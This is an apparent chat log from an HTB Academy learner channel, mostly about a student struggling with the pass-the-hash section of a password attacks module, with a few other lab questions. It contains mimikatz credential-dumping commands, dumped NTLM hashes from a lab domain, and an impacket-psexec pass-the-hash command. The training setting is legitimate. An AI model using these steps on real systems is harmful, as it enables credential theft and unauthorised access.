you also don't need to run lsadump::sam with the SAM/SYSTEM flags
Has anybody done the corporate OSINT module and if so what were ur thoughts on it
the user you're looking for is not a local user, try a way to dump domain user hashes
Hi Guys can someone help me with hashcat : Cracking Common hashes
ou i just found it hahahah xD thank u guys u have special powers 🙂
Ok I'm trying what you guys @fathom pendant and @safe star are saying. I got a little closer. Trying this and I get the domain but I'm having trouble figuring out how to actually dump the hashes:
mimikatz # lsadump::dcsync /user:david
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
[DC] 'david' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
mimikatz # lsadump::dcsync /domain:inlanefreight.htb
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
ERROR kuhl_m_lsadump_dcsync ; Missing user or guid argument
mimikatz # lsadump::dcsync /domain:inlanefreight.htb /usr:david
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
ERROR kuhl_m_lsadump_dcsync ; Missing user or guid argument
mimikatz # lsadump::dcsync /domain:inlanefreight.htb /user:david
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
[DC] 'david' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
mimikatz # lsadump::dcsync /domain:inlanefreight.htb /user:david /inject
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
[DC] 'david' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
can someone help with that?
I thought I was. I am looking at lsadump commands and tried others besides dcsync
again, it really helps when you include the module and section.
no one knows what you're doing and you may be way off what you're supposed to be doing
the administrator you're using is a local admin not domain admin, so you can only dump user domain hashes that recently connected to your machine.
you linked something totally outside of HTB
I did include it earlier most people here know what module and section I'm on
no you didn't, you linked a website outside of HTB and said you were working on that
as a tutorial
ok I am trying the tutorial on a hack the box challenge
which is Passwords Attacks module's pass the hash section
just saying, you're going to get a lot better help when you include the module and section. you never post it when you ask questions..
question 3 because I completed questions 1 and 2
I know I am doing pass the hash section on password attacks module on HTB Academy
I thought I said so
ok, review the section where they go over mimikatz commands. you're missing something.
ok I will
is this getting closer:
mimikatz # lsadump::lsa
Domain : MS01 / S-1-5-21-430213916-1543111962-1809483319
RID : 000001f4 (500)
User : Administrator
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003
RID : 000001f7 (503)
User : DefaultAccount
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003
RID : 000001f5 (501)
User : Guest
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003
RID : 000001f8 (504)
User : WDAGUtilityAccount
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003
and why doesn't david show up there?
nope
there's a prerequisite command you may need to run first
try running the commands shown in the module
ok now its showing NTLM hashes but david and julio's hashes aren't showing up:
mimikatz # lsadump::lsa /patch /domain:dc01.inlanefreight.htb
Domain : MS01 / S-1-5-21-430213916-1543111962-1809483319
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 30b3783ce2abf1af70f77d0660cf3453
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : 4b4ba140ac0767077aee1958e7f78070
mimikatz # lsadump::lsa /patch /domain:dc01.inlanefreight.htb /user:david
Domain : MS01 / S-1-5-21-430213916-1543111962-1809483319
ERROR kuhl_m_lsadump_lsa ; SamLookupNamesInDomain c0000073
can someone help me here?
i did bro.. use the command given in the module...
i did
impacket-psexec Administrator@10.129.176.31 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
so is that the wrong one?
wait hold on
you were asking about mimikatz earlier.. the mimikatz command you're running may need an additional argument, which is provided in the section you're on
ok
take 2 seconds to review it..
Web attack modules on "bypassing security filter"
idk if my internet is geeking cuz i did the thing im supposed to do and no results appear
Hi, may I have some help on the skill assessment for Web Proxies please ? I can't even reach the website (Failed to connect to ip:port). Is that normal ? Am I supposed to do something before being able to access the different directories to answer the questions ?
Your browser isn't connecting?
https is most likely your problem
No even with http I get the same error
What if you disable your proxy?
same issue, unable to connect
Really?
yes
From my vm, outside of my vm, with burp or zap or without both, using chrome or firefox 😦
I would terminate that one and grab a new target.
I checked it on my end and got the same thing, so yeah get something new.
Yeah click on reset and it should.
Yes it works now thanks
ABUSING HTTP MISCONFIGURATIONS : Advanced Cache Poisoning Techniques
Hey guys!
Currently working on fatget.wcp.htb, but unfortunately couldn’t find any solution at the moment.
Can I have a hint please?
Can you be a bit more specific regarding the thing you did? 😁
its fine
fixed
Awesome!
does the time limit for pwnbox reset after a day or month?
Is this the Introduction to NoSQL you're on @craggy urchin ?
Nope, tier 0 learn the basics of pen testing
Oh ok
Per day.
Do you have a link to the module / section you're having an issue with @craggy urchin ?
ah, so Starting Point is separate from Academy
for Academy, you get unlimited Pwnbox as soon as you purchase any amount of cubes, or any subscription
but I think for the main platform / starting point, the Pwnbox time limit is the same i.e. once your Pwnbox runs out of time, it will become available to you again after 24 hours
Ok, so yeah, that's not with the Academy, it's with the Lab platform, check the #starting-point channel for advice I suppose. Sorry, I don't have a great deal of experience with the Starting Point sections on the platform
actually I am incorrect .
Gotcha I don’t want to post too much so I don’t get in trouble I also have a screen shot of what’s going on. I followed the walk through step by step but still the flag won’t show